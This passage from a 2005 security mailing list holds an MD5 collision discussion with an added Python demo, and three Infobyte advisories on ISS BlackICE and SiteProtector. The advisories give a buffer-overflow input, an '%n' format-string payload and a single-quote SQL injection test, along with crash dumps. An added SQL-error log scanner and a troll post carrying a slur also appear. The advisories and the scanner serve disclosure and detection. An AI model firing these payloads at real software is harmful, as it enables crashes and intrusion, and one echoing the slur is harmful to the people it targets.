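    # Constructed sample: a zip of a dummy "song", then the same zip with a padded comment.
    original = make_zip("song.mp3", bytes(range(256)) * 4)
    padded = pad_zip_comment(original, b"\x00" * 64)
    target = b"trailer-for-the-next-star-wars-movie"  # the fixed file we do not control
    m1, m2, collision_tries = find_collision(32)
    m, preimage_tries = find_second_preimage(target, 16)
    return {
        "md5_changed": md5_hex(original) != md5_hex(padded),
        "content_same": members(original) == members(padded),
        "collision_ok": m1 != m2 and trunc_hash(m1, 32) == trunc_hash(m2, 32),
        "collision_32bit_tries": collision_tries,
        "preimage_ok": trunc_hash(m, 16) == trunc_hash(target, 16),
        "second_preimage_16bit_tries": preimage_tries,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it and compare the two try counts: both land in the tens of thousands, which is the point. Padding changes a hash for free; a 32-bit collision is cheap; but a second preimage at 32 bits would already take about 2^32 tries, and at MD5's full 128 bits it is out of reach, which is exactly the gap between "two files with the same hash as each other" and "a file with the same hash as theirs".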
From: Jason (security
brvenik.com)
Date: Fri Apr 08 2005 - 12:45:51 CDT
Valdis.Kletnieks
vt.edu wrote:
> On Fri, 08 Apr 2005 12:50:24 EDT, Jason said:
>>I think that entirely depends on the format the file is distributed in.
>>You could take a zipfile and pad it in non critical areas to change the
>>MD5 without creating a substantial difference in the deliverable
>>content. You could do the same with gzip or bzip formatted files. You
>>could also pad any embedded jpeg images to engineer a collision. There
>>are quite a few opportunities where this method could be used to twiddle
>>the new MD5 without materially changing the content.
> It's easy to tweak a file and get a different MD5. That's why Tripwire works.
>>Software that is ~150M in size, it gets redistributed as a new file that
>>is 160M in size but has a collision with your software which is also
>>160M in size. I imagine there would be some computational time involved
>>to find the appropriate collision but a lot less computational time than
>>finding a perfect match to the original.
> You're missing the point.
> Let's say we have a file A that's 150M in size, and a file B that's 160M in
> size. File B is *not* under our control, and has a known fixed MD5 hash.
> It's easy to take file A, and create 2 files C and D from it that happen to
> have the same MD5 hash as each other. What is *NOT* easy is creating a file E
> that has the same hash as A or B.
I get the point just fine. Injecting files C and D results in a
situation that cannot be resolved without downloading both files.
Song A = mp3 format file with valid license to BSA
Song B = mp3 format file without valid license to BSA
Song C = zip of Song A plus pad to generate MD5
Song D = zip of Song B plus pad to generate same MD5
It is now impossible to distinguish between C and D without downloading
both. The content inside is still fully usable and valid but a violation
cannot be confirmed without yourself violating the law.
What you might see in a DL dialog:
NAME               MD5          SIZE
somefile.zip       ABCD321312   120M
someotherfile.zip  ABCD321312   120M
You cannot remotely know that either file is in fact the content you are
looking for without downloading both files. Both files may not be the
content you are looking for. How can you remotely distinguish that a
violation has occurred?
Valdis.Kletnieks
vt.edu
Date: Fri Apr 08 2005 - 13:53:31 CDT
On Fri, 08 Apr 2005 13:45:51 EDT, Jason said:
> I get the point just fine. Injecting files C and D results in a
> situation that cannot be resolved without downloading both files.
>
> Song A = mp3 format file with valid license to BSA
> Song B = mp3 format file without valid license to BSA
> Song C = zip of Song A plus pad to generate MD5
> Song D = zip of Song B plus pad to generate same MD5
>
> It is now impossible to distinguish between C and D without downloading
> both. The content inside is still fully usable and valid but a violation
> cannot be confirmed without yourself violating the law.
On the other hand, note the following:
1) The copyright nazis aren't going to be looking for C *or* D, because they're
only looking for files that have the same hash as A. They'd have to actually
download C and D and *listen* to it, and identify it (quick - how do you tell
the difference between the audio content of the original Beatles "Come Together"
and the Aerosmith cover of the same song?)
2) It's of course simple to create an arms race where the copyright nazis need to
expend more effort because they can't just go after the MD5 sum. However, it cuts
both ways - if you see 15 copies of a file available with the same MD5 sum, you can
have *some* trust it's not corrupted. If you see 15 copies with 15 different hashes,
which one do you trust?
3) If you change the size, date, and MD5 hash and rename it to "Frozzle-bar.doc",
you're not likely to get a note from Metallica's representative about the
pirated copy of their album. But it's probably not going to be accessed very
much unless you re-rename it to Frozzle-bar-really-metallica-master-of-puppets.doc.
Of course, at that point, you *may* get a note from their representative.. :)
lor.tharholm
hushmail.com
Date: Fri Apr 08 2005 - 13:59:43 CDT
>You and I couldn't possibly build what PivX has built in terms of
>professional corporate structure, public NASDAQ stock exchange
>listing, business relationships and loyal partners, qualified
>employees, paying customers, etc for anything less than PivX has
>spent to get where it is today, with its existing problems-and-
OTC BB:PIVX.OB YOU TO RED EYE BATTYBWOY
Singer Lewak Greenbaum & Goldstein LLP ("Singer") resigned
substantial doubt about the Company's ability to continue as a
going concern.
Robert N. Shively resigned as President, Treasurer, Chief Executive
Officer and Acting Chief Financial Officer
Geoff Shively resigned as Chief Scientist and a director of the
Company
>I will gladly testify at your criminal trial as to the technical
>and forensic issues that disprove your assertions of wrongdoing by
>PivX. I have an intimate understanding of these issues, and of
>this company.
SINSEMILLA SKIN YOUR TEETH WHOLE HEAP YA NUH SEE?
.:.
:|:
.:|:.
::|::
:. ::|:: .:
:|:. .::|::. .:|:
::|:. :::|::: .:|:;
`::|:. :::|::: .:|::'
::|::. :::|::: .::|:;
`::|::. :::|::: .::|::'
:::|::. :::|::: .::| ::;
`:::|::. :::|::: .::|::;'
`::. `:::|::. :::|::: .::|::;' .:;'
`:::.. ?::|::. :::|::: .::|::? ..::;'
`:::::. ':|::. :::|::: .::|:' ,::::;'
`:::::. ':|:::::|:::::|:' :::::;'
`:::::.:::::|::::|::::|::::.,:::;'
':::::::::|:::|:::|:::::::;:'
':::::::|::|::|:::::::''
`::::::::::;'
.:;'' ::: ``::.
:':':
CHA!
From: Microsoft Security Response Center (secure
microsoft.com)
Date: Fri Apr 08 2005 - 14:21:05 CDT
Hello!
The Microsoft Security Response Center investigates all reports of
security vulnerabilities sent to us that affect Microsoft products.
If you believe you have found a security vulnerability affecting a
Microsoft product, we would like to work with you to investigate it.
We are concerned that people might not know the best way to report
security vulnerabilities to Microsoft. You can contact the Microsoft
Security Response Center to report a vulnerability by emailing
secure
microsoft.com directly, or you can submit your report via our
web-based vulnerability reporting form located at:
https://www.microsoft.com/technet/security/bulletin/alertus.aspx.
Sincerely,
Microsoft Security Response Center
From: Francisco Amato (famato
infobyte.com.ar)
Date: Fri Apr 08 2005 - 14:23:13 CDT
||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 04.08.2005
||
.:: SUMMARY
ISS - Internet Security Systems, RealSecure Desktop and BlackICE PC Protection
Buffer Overflow
Version: BlackIce 7.0.322. It is suspected that all previous versions of BlackIce are vulnerable.
.:: BACKGROUND
BlackICE products provide Intrusion Detection, personal firewall, and
application protection.
http://www.iss.com
.:: DESCRIPTION
A local buffer overflow vulnerability affects RealSecure Desktop and BlackICE PC Protection.
This issue is due to a failure of the application to securely copy user-supplied data
into the name field of rules that the user creates.
Buffer used: A * 445
Information of Registers:
EAX 41414141
ECX 41414141
EDX 41414175
EBX 00000001
ESP 0012EC5C
EBP 0012EF00
ESI 0048A8E0 blackice.0048A8E0
EDI 00F29704
EIP 004055AF blackice.004055AF
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 0038 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_ALREADY_EXISTS (000000B7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty -NAN FFFF FFD0D0C8 FFD0D0C8
ST1 empty -??? FFFF 00000000 00000000
ST2 empty -??? FFFF 00FE00CF 00CF00C7
ST3 empty -??? FFFF 00FE00CF 00CF00C7
ST4 empty -NAN FFFF FFD0D0C8 FFD0D0C8
ST5 empty -??? FFFF 00FF00D0 00D000C8
ST6 empty -??? FFFF 00000000 00000000
ST7 empty -??? FFFF 00800080 00800080
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
.:: EXTRA
We did not find any way to gain additional privileges
.:: DISCLOSURE TIMELINE
03/22/2005 Initial vendor notification
03/25/2005 Initial vendor response
04/08/2005 Public disclosure
.:: CREDIT
Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar
.:: LEGAL NOTICES
Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as it is not
edited in any way unless authorized by Infobyte Security Research Response.
Reprinting the whole or part of this alert in any medium other than electronically
requires permission from infobyte com ar
Disclaimer
The information in the advisory is believed to be accurate at the time of publishing
based on currently available information. Use of the information constitutes acceptance
for use in an AS IS condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this information.
From: Francisco Amato (famato
infobyte.com.ar)
Date: Fri Apr 08 2005 - 14:24:46 CDT
||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 04.08.2005
||
.:: SUMMARY
ISS - Internet Security Systems, RealSecure Desktop and BlackICE PC Protection
Format String
Version: BlackIce 7.0.322. It is suspected that all previous versions of BlackIce are vulnerable.
.:: BACKGROUND
BlackICE products provide Intrusion Detection, personal firewall, and application protection.
http://www.iss.com
.:: DESCRIPTION
A local format string vulnerability affects RealSecure Desktop and BlackICE PC Protection.
This issue is due to a failure of the application to securely copy user-supplied data into
the name field of rules that the user creates.
Buffer used: AAAA%n%n%n%n
Information of Registers:
EAX 41414141
ECX 00000004
EDX 00000200
EBX 0000006E
ESP 0012E578
EBP 0012E7D0
ESI 0012E82A ASCII "%n, "
EDI 00000800
EIP 7800FB05 MSVCRT.7800FB05
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 0038 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_ALREADY_EXISTS (000000B7)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFF8FCF8 FFF8FCF8
ST1 empty -??? FFFF 00000000 00000000
ST2 empty -??? FFFF 00FE00F7 00FB00F7
ST3 empty -??? FFFF 00FE00F7 00FB00F7
ST4 empty -NAN FFFF FFF8FCF8 FFF8FCF8
ST5 empty -??? FFFF 00FF00F8 00FC00F8
ST6 empty -??? FFFF 00000000 00000000
ST7 empty -??? FFFF 00800080 00800080
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
.:: EXTRA
We did not find any way to gain additional privileges
.:: DISCLOSURE TIMELINE
03/22/2005 Initial vendor notification
03/25/2005 Initial vendor response
04/08/2005 Public disclosure
.:: CREDIT
Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar
.:: LEGAL NOTICES
Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as it is not
edited in any way unless authorized by Infobyte Security Research Response.
Reprinting the whole or part of this alert in any medium other than electronically
requires permission from infobyte com ar
Disclaimer
The information in the advisory is believed to be accurate at the time of publishing
based on currently available information. Use of the information constitutes acceptance
for use in an AS IS condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this information.
From: Francisco Amato (famato
infobyte.com.ar)
Date: Fri Apr 08 2005 - 14:25:29 CDT
||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 04.08.2005
||
.:: SUMMARY
ISS - SiteProtector Console Sql-Injection
Version: 2.0.5.690. It is suspected that all previous versions of SiteProtector Console are vulnerable.
.:: BACKGROUND
SiteProtector is a security management system that provides a centralized
view and analysis of network,
server, and desktop protection agents and appliances.
http://www.iss.com
.:: DESCRIPTION
A SQL injection vulnerability affects SiteProtector Console.
This issue is due to a failure of the application to securely copy user-supplied data into
the "Tag Name" and "Object Name" fields of Incidents/Exceptions that the user creates or modifies.
Simple test string: a single quote (')
Error displayed when the injection is made:
######################BEGIN############################
A Database or SQL Error occurred while working with Site Rules.
net.iss.rssp.gui.site.analysis.exceptions.CommonSiteRuleException
at net.iss.rssp.gui.site.analysis.AnalysisDataManager.throwCommonSiteRuleException(AnalysisDataManager.java:442)
at net.iss.rssp.gui.site.analysis.AnalysisDataManager.createSiteFilter(AnalysisDataManager.java:350)
at net.iss.rssp.gui.site.analysis.command.AddEditSiteRuleCommand.execute(AddEditSiteRuleCommand.java:48)
at net.iss.command.CommandTemplate.templateExecute(CommandTemplate.java:179)
at net.iss.command.CommandHandler.executeCommand(CommandHandler.java:148)
at net.iss.command.CommandHandler.run(CommandHandler.java:116)
A database error occurred in the method "createNewSiteRule".
net.iss.rssp.entity.exceptions.SiteRuleException
at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:357)
at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Database Error
SQL State = 42000
Vendor code = 105
Vendor msg = [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND OSF.SiteFilterRuleID = 853)'.
net.iss.rssp.db.DataAccessException
at net.iss.rssp.server.database.DatabaseObjectHandlerBase.handleSQLException(DatabaseObjectHandlerBase.java:75)
at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:134)
at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Error Inserting into table ObservanceSiteFilters Code: 52000 DB Key: 0
java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND OSF.SiteFilterRuleID = 853)'.
at ids.sql.IDSSocket.error(IDSSocket.java:325)
at ids.sql.IDSSocket.verify(IDSSocket.java:270)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:103)
at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND OSF.SiteFilterRuleID = 853)'.
at ids.sql.IDSSocket.error(IDSSocket.java:325)
at ids.sql.IDSSocket.verify(IDSSocket.java:270)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:103)
at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Line 10: Incorrect syntax near '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND O'.
at ids.sql.IDSSocket.error(IDSSocket.java:325)
at ids.sql.IDSSocket.verify(IDSSocket.java:270)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:103)
at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
at net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBrokerImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.java:22)
at net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
#######################END#############################
.:: EXTRA
We did not find any way to perform any unauthorized actions or gain
additional privileges.
.:: DISCLOSURE TIMELINE
04/01/2005 Initial vendor notification
04/06/2005 Initial vendor response
04/08/2005 Public disclosure
.:: CREDIT
Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar
.:: LEGAL NOTICES
Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as
it is not edited in any way unless authorized by Infobyte Security Research Response.
Reprinting the whole or part of this alert in any medium other than
electronically requires permission from infobyte com ar
Disclaimer
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. Use of the information
constitutes acceptance for use in an AS IS condition. There are no warranties
with regard to this information.
Neither the author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or reliance on,
this information.
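The stack traces above are what the injection looks like from the server side. As an added example, not part of the advisory or of the ISS code base, here is a small log scanner that flags such SQL syntax errors and names the application frame that built the query; the log it scans is constructed from the traces quoted above, with a made-up IOException as a non-match.

```python
"""Scan Java server logs for SQL syntax errors that point at string-built
queries.  Added example, not from the advisory or the ISS code base; the
sample log is constructed from the SiteProtector stack traces quoted in
the advisory (the leading IOException is made up as a non-match)."""
import re
from collections import Counter
from dataclasses import dataclass, field

# SQL Server error texts that mean the statement itself was malformed, which
# is exactly what a stray quote in user-supplied input produces.
SYNTAX_ERROR_RE = re.compile(r"Unclosed quotation mark|Incorrect syntax near")
SQLSTATE_RE = re.compile(r"^\[(?P<state>[0-9A-Z]{5})\]")
EXC_RE = re.compile(
    r"^(?P<cls>(?:[A-Za-z_$][\w$]*\.)+[A-Za-z_$][\w$]*(?:Exception|Error))"
    r"(?::\s*(?P<msg>.*))?$")
FRAME_RE = re.compile(r"^\s*at\s+(?P<frame>\S.*)$")
# Runtime, RMI plumbing and the JDBC driver did not build the query text;
# skip them to reach the first application frame.
FRAMEWORK_PREFIXES = ("java.", "javax.", "sun.", "ids.sql.")

SAMPLE_LOG = """\
java.io.IOException: Connection reset
    at java.net.SocketInputStream.read(Unknown Source)
    at java.lang.Thread.run(Unknown Source)
java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND OSF.SiteFilterRuleID = 853)'.
    at ids.sql.IDSSocket.error(IDSSocket.java:325)
    at ids.sql.IDSSocket.verify(IDSSocket.java:270)
    at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
    at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:103)
    at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
    at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
    at java.lang.Thread.run(Unknown Source)
java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL Server]Line 10: Incorrect syntax near '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND O'.
    at ids.sql.IDSSocket.error(IDSSocket.java:325)
    at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
    at net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:103)
    at net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:348)
    at java.lang.Thread.run(Unknown Source)
"""


@dataclass
class SqlSyntaxFinding:
    exception: str
    sqlstate: str
    message: str
    app_frame: str  # first frame outside FRAMEWORK_PREFIXES, "" if none
    frames: list = field(default_factory=list)


def _parse_exceptions(lines):
    """Group log lines into (class, message_lines, frames).  Lines between an
    exception header and its first 'at' frame are message text, which is how
    the driver echoes the offending multi-line SQL back."""
    current = None
    for raw in lines:
        line = raw.rstrip()
        header = EXC_RE.match(line)
        if header:
            if current:
                yield current
            current = (header.group("cls"), [header.group("msg") or ""], [])
            continue
        if current is None:
            continue
        frame = FRAME_RE.match(line)
        if frame:
            current[2].append(frame.group("frame"))
        elif line and not current[2]:
            current[1].append(line)
    if current:
        yield current


def find_sql_syntax_errors(log_text):
    """Return one finding per java.sql exception whose message is a SQL
    Server syntax error, with SQLSTATE and the application frame."""
    findings = []
    for cls, msg_lines, frames in _parse_exceptions(log_text.splitlines()):
        message = "\n".join(msg_lines)
        if not cls.startswith("java.sql.") or not SYNTAX_ERROR_RE.search(message):
            continue
        state = SQLSTATE_RE.match(message)
        app_frame = next((f for f in frames if not f.startswith(FRAMEWORK_PREFIXES)), "")
        findings.append(SqlSyntaxFinding(
            cls, state.group("state") if state else "", message, app_frame, frames))
    return findings


def hot_spots(findings):
    """Count findings per application frame: the same frame failing repeatedly
    on quote characters is the code path to review for string-built SQL."""
    return dict(Counter(f.app_frame for f in findings))


if __name__ == "__main__":
    found = find_sql_syntax_errors(SAMPLE_LOG)
    for f in found:
        print(f"SQLSTATE {f.sqlstate} at {f.app_frame}: {f.message.splitlines()[0]}")
    print(hot_spots(found))
```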
From: Jason Coombs (jasonc
science.org)
Date: Fri Apr 08 2005 - 14:54:10 CDT
> The content inside is still fully usable
> and valid but a violation cannot be
> confirmed without yourself violating
> the law.
First of all, what law do you believe is violated by 'downloading' an unauthorized MP3 duplication of a recording?
Fair use doctrine covers this situation in a number of ways. For example, you do not violate copyright by downloading a file in order to find out what it is and where it came from, any more than you violate copyright by tuning into a radio broadcast. Somebody ELSE violates copyright if they broadcast a copyright-protected work, or distribute copies for download. You, as downloader, are fully within the fair use doctrine if you just receive, contemplate, and destroy upon recognizing that the work was not distributed by an authorized distributor/broadcaster.
How do you know what is and isn't authorized? Are you required to judge a book by its cover, even though the cover is nothing more than a filename in these cases? You are fully within the fair use doctrine if you download for the sole purpose of causing your computer to examine metadata that may allow you to determine the content, or if you contemplate the content with your senses by playback or access -- when and if you are satisfied that you have received a work that perhaps has not been duly licensed, you are in fact free to locate the copyright holder and negotiate a license.
Furthermore, in the get-a-clue department once again, the people who are doing the downloading to assist copyright holders with enforcement actions or investigations HAVE WRITTEN PERMISSION and therefore cannot be accused of violating the law by doing the download.
Why do people insist on spreading FUD when these are simple matters of intellectual property law and contract law that any person above the mental age of 14 has no trouble understanding when the facts are presented clearly?
Cheers,
Jason Coombs
jasonc
science.org
From: Georgi Guninski (guninski
guninski.com)
Date: Fri Apr 08 2005 - 15:17:08 CDT
On Fri, Apr 08, 2005 at 12:21:05PM -0700, Microsoft Security Response Center wrote:
> If you believe you have found a security vulnerability affecting a
> Microsoft product, we would like to work with you to investigate it.
>
hahahahahaha
m$ doing social engineering on fd, this is a joke.
basically they want your 0days so billg becomes more rich.
--
where do you want bill gates to go today?
From: Jason Coombs (jasonc
science.org)
Date: Fri Apr 08 2005 - 15:20:39 CDT
I'm glad you wrote again, 'Lor'.
You missed the press release? Or maybe you fail to comprehend good news when you see it.
I'll send a copy of the press release. Please let us all know what you think.
Sincerely,
Jason Coombs
jasonc
science.org
-----Original Message-----
From: <lor.tharholm
hushmail.com>
Date: Fri, 8 Apr 2005 11:59:43
To:full-disclosure
lists.grok.org.uk
Subject: Re: [Full-disclosure] I need uh Qwik-Fix please sho 'nuff!
>You and I couldn't possibly build what PivX has built in terms of
>professional corporate structure, public NASDAQ stock exchange
>listing, business relationships and loyal partners, qualified
>employees, paying customers, etc for anything less than PivX has
>spent to get where it is today, with its existing problems-and-
OTC BB:PIVX.OB YOU TO RED EYE BATTYBWOY
Singer Lewak Greenbaum & Goldstein LLP ("Singer") resigned
substantial doubt about the Company's ability to continue as a
going concern.
Robert N. Shively resigned as President, Treasurer, Chief Executive
Officer and Acting Chief Financial Officer
Geoff Shively resigned as Chief Scientist and a director of the
Company
>I will gladly testify at your criminal trial as to the technical
>and forensic issues that disprove your assertions of wrongdoing by
>PivX. I have an intimate understanding of these issues, and of
>this company.
SINSEMILLA SKIN YOUR TEETH WHOLE HEAP YA NUH SEE?
.:.
:|:
.:|:.
::|::
:. ::|:: .:
:|:. .::|::. .:|:
::|:. :::|::: .:|:;
`::|:. :::|::: .:|::'
::|::. :::|::: .::|:;
`::|::. :::|::: .::|::'
:::|::. :::|::: .::| ::;
`:::|::. :::|::: .::|::;'
`::. `:::|::. :::|::: .::|::;' .:;'
